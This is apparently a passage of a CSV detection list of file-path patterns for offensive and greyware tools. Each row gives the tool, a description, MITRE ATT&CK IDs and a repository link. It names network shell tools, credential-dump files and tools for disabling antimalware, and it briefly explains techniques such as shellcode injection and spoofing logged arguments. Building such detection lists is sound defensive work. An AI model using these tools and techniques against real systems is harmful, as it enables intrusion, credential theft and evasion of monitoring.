-*\ThemeBleed.sln*,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*\TheThing.exe*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*\TikiCompiler.txt*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\TikiService.exe*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\TikiSpawn.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\tikispawn.xml*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\TikiTorch\Aggressor*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\tir_blanc_holiseum\*.exe*,greyware_tool_keyword,tir_blanc_holiseum,Ransomware simulation,T1486 - T1204 - T1027 - T1059,TA0040 - TA0002 - TA0005,N/A,N/A,Ransomware,https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware,1,0,N/A,4,6,N/A,N/A,N/A,N/A -*\tmp\dll-collection*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*\TokenDump.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\tokenprivileges.c*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\tokenprivileges.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\Tokenvator\*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*\Tor\tor.exe*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*\Tor\torrc*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*\TorBrowser*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*\TrustExec.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\UACME-*.zip*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*\uberfile.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\unDefender.exe*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,0,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*\unquotedsvcpath.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\updog-master\*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*\usbmon.txt*,offensive_tool_keyword,usbmon,USB capture for Linux.,T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://www.kernel.org/doc/Documentation/usb/usbmon.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\*\AppData\Local\GoodSync*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\Users\*\AppData\Local\Temp\*.megatools.cache*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*\Users\Public\*.dmp*,greyware_tool_keyword,procdump,Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\Public\*ntds.dit*,greyware_tool_keyword,wmic,this file shouldn't be found in the Users\Public directory. Its presence could be a sign of an ongoing or past attack.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\Public\*ntds.jfm*,greyware_tool_keyword,wmic,Like the ntds.dit file it should not normally be found in this directory.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\Public\nc.exe*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,0,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*\users\public\sam.save*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*\users\public\system.save*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*\Users\Public\termsrv.dll*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*\Users_Nochangedpassword.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\uTorrent\*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\utweb.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\UUID_bypass.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*\wce32.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*\wce64.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*\wce-beta.zip*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*\wdextract.cpp*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract.sln*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract.vcxproj*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract32.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract64.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\WdigestOffsets.csv*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*\WfpTokenDup.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\whatlicense-main\*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\WheresMyImplant*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*\while_dll_ms*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Windows\Prefetch\PSEXEC*,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\Windows\Tasks\Certipy*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*\Windows\Tasks\p4yl0ad*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*\Windows\Temp\creds.db*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*\windows\temp\ncat.exe -nv *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*\windows\temp\pwned.trx*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*\Windows-Passwords.ps1*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*\WindowsShareFinder.cs*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*\Win-PS2EXE*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,0,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*\WinRing0x64.sys*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\WiperPoc.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense 